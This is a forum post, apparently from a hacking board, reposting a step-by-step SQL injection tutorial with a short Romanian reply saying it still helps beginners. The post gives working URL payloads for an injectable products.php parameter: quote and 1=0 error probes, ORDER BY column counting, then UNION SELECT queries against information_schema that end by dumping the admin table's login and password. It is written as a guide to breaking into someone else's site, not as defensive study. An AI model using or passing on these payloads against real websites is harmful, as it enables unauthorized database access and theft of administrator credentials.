Aerosol Posted November 28, 2014 Report Posted November 28, 2014 Credit's to: JokerStep 1. The websiteOkay so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty.Step 2. Finding the vulnerabilityOkay before we actually are able to do this attack we need to find a vulnerability.To do this we will have to go to pages and click on other pages we find within the main page we clicked on, for this example I'll use "Products". After you are in the "Products" section just click on a product and then we can get into the fun part, I'll be using "Herbs" for this. After you chose your product group such as "Herbs" click on a product within the category and you will be taken to the page for that product. To notice if we have found a vulnerable page in the "Products" section look at the website URL, it should have something likeproducts.php?prodid=<number>If it does then to find out if it is vulnerable we need to put a ' or a fucked up piece of math logic such as 1=0--If done correctly the URL should look likeproducts.php?prodid=<number>' or 1=0--If the site is vulnerable you should have an error like this.Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1Step 3. Exploiting the vulnerabilityIf you got this far you have obviously understood the first 2 steps, now let's move on. Once you have found your vulnerability we can now exploit it in order to get some info that we shouldn't be able to get. First let's start with getting the table names on the page by typing in the following into the website url.products.php?prodid=<number> order by 20--Now for this website it should have came up with an error that says,Error performing query: Unknown column '20' in 'order clause'if it does than we know our number is too big, so let's cut the number in half with 15 and put it into the URL.products.php?prodid=<number> order by 15--Once again we should get the same error but this time the number should be 15. We are now going to drop down 5 more times to 10, if done correctly it should be.products.php?prodid=<number> order by 10--We also get the same error just with the number 10, so why not drop to 5?products.php?prodid=<number> order by 5--Holy shit we no longer have an error!, but we still need to find the max number we can go at in order to do this attack properly. I suggest you increment the number by 1 until you can no longer can view the page and begin to get an error again.Step 4. Finding the table namesIf you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will be covering how to get the table names first.Okay so, to get the name of what is known as in the SQL syntax as a "table" we need to add some more lines of code into the URL bar. The code we will be adding needs to have what we currently have, deleted. After what we currently have we need to insert the following code.products.php?prodid=-<number> union select 1,2,3,4,5,6,7--If done correctly you should see a number on your screen, this shows what number is vulnerable and we can start attacking. If this was not done correctly and you still see words on the screen place a minus sign(-) in front of the product id.Now to get the table names we need to format the URL string as followed.products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--If done correctly you should see text such as.CHARACTER_SETSYou may now scroll through the tables and see what you would like, I want to get admin login info so I will use the "admin" table I have found.Step 5. Getting column namesOkay to get the names of what is known in the SQL syntax as a"column" all we need to do is go back to what we need in "Step 4" and just change it with this.products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--Once this is done you may look through what you want and as I said, I wanted admin login. I will proceed to use the columns "login" and "password".Step 6. Getting our login infoOkay now to get the login info that we wanted we need to make sure that we wrote down what the info was to get it, if we didn't we need to look again. Now since I wrote the info I needed down I now know that what I need to use is below.login, password, adminNow you may be wondering how do we use what we have obtained, well it's simple. Just follow my instructions and you will have admin info. To get the info we need to take the string we currently have which should be.products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columnsWe need to replace "column_name" and "schema.columns" with "concat(login,0x3a,password" and "admin". Once this is done it should look like this.products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin-- Quote
Aerosol Posted November 28, 2014 Author Report Posted November 28, 2014 Tutorial vechi de vreo 5 ani...Dar mai sunt useri incepatori si ii ajuta Quote